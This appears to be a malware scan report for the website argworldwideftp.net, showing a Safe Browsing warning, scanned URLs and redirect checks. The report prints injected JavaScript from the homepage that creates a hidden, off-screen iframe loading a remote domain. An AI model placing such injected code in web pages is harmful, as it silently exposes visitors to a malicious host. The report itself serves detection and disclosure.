Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=argworldwideftp.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://argworldwideftp.net/ | 200 OK Content-Length: 7445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute';_q[_n]('src', 'http://ofeverquest.com/index.php');_q.style.position = 'absolute';_q.style.width = '10px';_q[_n]('frameborder', navigator.userAgent.indexOf('331c6883dd6010864b7ead130be77cd5') + 1);_q.style.left = '-4097px';document.write('<div id=\'miadv\'></div>');document.getElementById('miadv').appendChild(_q); Antivirus reports:
| ||
http://www.nuovaimpresa.org/cjvyVtZG.php?id=33468186 | 404 Not Found Content-Length: 280 Content-Type: text/html | clean |
http://www.nuovaimpresa.org/test404page.js | 404 Not Found Content-Length: 282 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: argworldwideftp.net
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 03:07:23 GMT
Server: Microsoft-IIS/7.0
Content-Length: 7445
Content-Type: text/html
X-Powered-By: ASP.NET
...7445 bytes of data.
GET / HTTP/1.1
Host: argworldwideftp.net
Result:
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 03:07:23 GMT
Server: Microsoft-IIS/7.0
Content-Length: 7445
Content-Type: text/html
X-Powered-By: ASP.NET
...7445 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: argworldwideftp.net
Referer: http://www.google.com/search?q=argworldwideftp.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: argworldwideftp.net
Referer: http://www.google.com/search?q=argworldwideftp.net
Result:
The result is similar to the first query. There are no suspicious redirects found.